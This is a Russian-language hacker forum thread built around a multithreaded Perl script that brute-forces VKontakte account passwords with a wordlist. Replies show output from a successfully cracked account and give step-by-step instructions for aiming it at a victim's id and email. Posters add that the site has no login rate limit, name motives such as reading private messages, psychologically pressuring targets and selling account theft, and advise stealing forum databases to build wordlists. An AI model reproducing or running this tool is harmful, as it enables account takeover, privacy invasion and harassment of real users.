vkontakte brutforce

[baltazar]

#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt';  #словарь паролей
$id = 111111;  #id цели
$mail = 'mail%40mail.com';	#мыло, вместо @ вписать %40
$threads = 4;  #количество потоков
######################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
	"Host: vkontakte.ru\r\n".
            "Accept: */*\r\n".
            "Content-Type: application/x-www-form-urlencoded\r\n".
            "User-Agent: Mozillo\r\n".
            "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
            "Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass  $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
	my (@mas);
	while (<pass>){
	push @mas, $_;
	last if (@mas == 400);
	}
	chomp @mas;
	return @mas;
}

$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков

 

[profeto]

силв, читай лучше. не мс-дос, а мД-дос ^^
По теме:
- гуй добавлять извращение
- хм, вконтакте нет ограничений по количеству неверных логинов с одного IP? (Ненавижу соц. сети, поэтому на сайте был пару раз максимум)
- +1 к поддержке соксов. негоже дед палить (с)

 

[Ŧ1LAN]

>SilverT лол, а ты через что этот скрипт запускать будеш ?
Я у себя запускаю так.. )

t1@t1lan:perl$ perl vkontakte_br.pl
...

Не всё мс-дос, что консоль (с) я ))

UP:
Вот кстате кто-то просил.. "если у кого-то получиться"(или шото в этом роде)

t1@t1lan:perl$ perl vkontakte_br.pl
7&4~^!|,73.0 HTTP/1.1 200 OK
66)3~:7,^%)& HTTP/1.1 200 OK
%{64}235^:.4 HTTP/1.1 200 OK
...
603222804433 HTTP/1.1 200 OK
123456789012 HTTP/1.1 302 Found
7041426:123456789012:3417973cd67f37b077e56b82f0cc306f

 

[Isis]

GUI в привате уже как месяца 2

 

[holder]

а может кто нибудь скомплиить а то самому некогда и выложить

 

[Sparrow]

- хм, вконтакте нет ограничений по количеству неверных логинов с одного IP? (Ненавижу соц. сети, поэтому на сайте был пару раз максимум)

Неа, они не поддерживают.. хоть мильон вводи)).

 

[SQL]

а может кто нибудь скомплиить а то самому некогда и выложить

А чё там долгого и трудного?
Как запустить:
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняешь id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускай файл, и радуйся...
6. создастся good.txt, где и будет твой пасс.

 

[Norway Wolf]

а есть ли смысл проводить атаку влоб... ВКОНТАКТЕ поддерживает автаризацию по кукисам... ИМХО перехват кукисов намного эффективней если целью являеться получение учетной записи конкретного пользователя...

 

[TheSADIST]

Да и вообще какой смысл снимать акк с вконтакте?

 

[Norway Wolf]

чтобы почитать к примеру переписку получить,собрать информацию о конретном пользователе для дальнейшего психологического воздействия на него... имхо вконтакт отличная база данных

 

[@$_terr_X]

зарабатывать угоном акка на заказ многие готовы платить, чтоб узнать пасс жертвы.

 

[salamandra]

Такие топики нуно в другой отдел!

 

[sysrepos]

а что за файл со словарём, где его взять?!

 

[Norway Wolf]

sysrepos жжошь)))

господа с такими вопросами лучше идите в гугл... но так как у меня хороше настроение (празнег же все-таки)...))

брутфорс бывает нескольких видов.
1. сплошным перебором где система переберает все возможные комбинации соответствии с заданым алфавитом. но это время затраный способ и иногда не просто не представляеться возможным. поэтому используют второй способ
2. перебор по словарю - система перебирает все пароли указаные в файле (словаре)
лучше словарь составлять самому, неплохо еще со знанием социалогии...

мега рецепт как составить словарь))

1.хачим форум
2.тырим базу с учетными записями
3. вытаскиваем пароли всех пользователей записываем в файл.
4. проделываем несколько раз

и о чудо у нас мега словарь...

 

[groundhog]

мега рецепт как составить словарь))

1.хачим форум
2.тырим базу с учетными записями
3. вытаскиваем пароли всех пользователей записываем в файл.
4. проделываем несколько раз

и о чудо у нас мега словарь...

А вам не вдомёк, что в большинстве движков пароли хешированы?

 

[Norway Wolf]

радует что появились опоненты хоть будет с кем конструктивно подскутировать...

если вы могли заметить то данным методом я хотел показать что большенство словарей не эфективны, ибо в основном они состоят из паролей
представляющих из себя определенные слова из английского словаря и большенство этих паролей не используются... поэтому словарь
было предложенно составить из реальной базы (варианты реализации и сложность не рассматривалась). И не являются руководством к действию. имхо методы реализации человек должен придмывать сам...

ЗЫ:
самый лучший вариант если словарь составляеться с учетом целевой аудитории

 

[groundhog]

Norway Wolf, ну как сказать... Словарь словарю рознь... Если у тебя есть очень большой словарь, то вероятность, того, что там окажется нужный пароль растёт прямопропорционально размеру словаря... Кроме того, словари можно применять не только для тупого брутфорса, но и для комбинированной атаки по словарям, что в свою очередь расширяет потенциальное множество возможных словарей. Ну и могу добавить ещё одно, в ходе брута всегда накапливается некоторое множество актуальных паролей... Которые в следующий раз дадут возможность сократить время поиска паролей... У меня, например, накопилась база, которая при бруте ENG аккаунтов дают пробив 70-80 процентов при количестве аккаунтов от 3 тыс.

К чему я это всё говорю? Да к тому, что никогда одним методом в бруте не обойдёшься. Сначала брутишь по накопленной базе, потом брутишь комбинированной атакой, потом брутишь по всевозможным словарям, потом брутишь тупым перебором... Ну и не стоит забывать про rainbow-таблицы - на сегодняшний день, пожалуй, самое актуальное средство в бруте паролей, пускай и очень-очень трудоёмкое.

 

[Norway Wolf]

размер словоря прямопропорционален времяни

зы: если обьект действительно серьезный они меняют пароли в определенный периуд время, а если обьект не особо то
логичен вопрос о целесообразности затраты такого количества время...

 

[Diabolik]

зы: если обьект действительно серьезный они меняют пароли в определенный периуд время, а если обьект не особо то
логичен вопрос о целесообразности затраты такого количества время...

Если человек серьёзный он может просто напросто поставить довольно сложный пароль и быть предельно осторожным.
По теме: Брутфорс для контакта это хорошая вещь т.к там собираются люди не забочищуюся о своей безопстности и пароли у них лёгкие можно даже какнить попробовать посмотреть дату рождения и подставить в пароль готов поспорить что из 100 хоть 1 да пароль подойдёт , вот бы это автоматизировать.....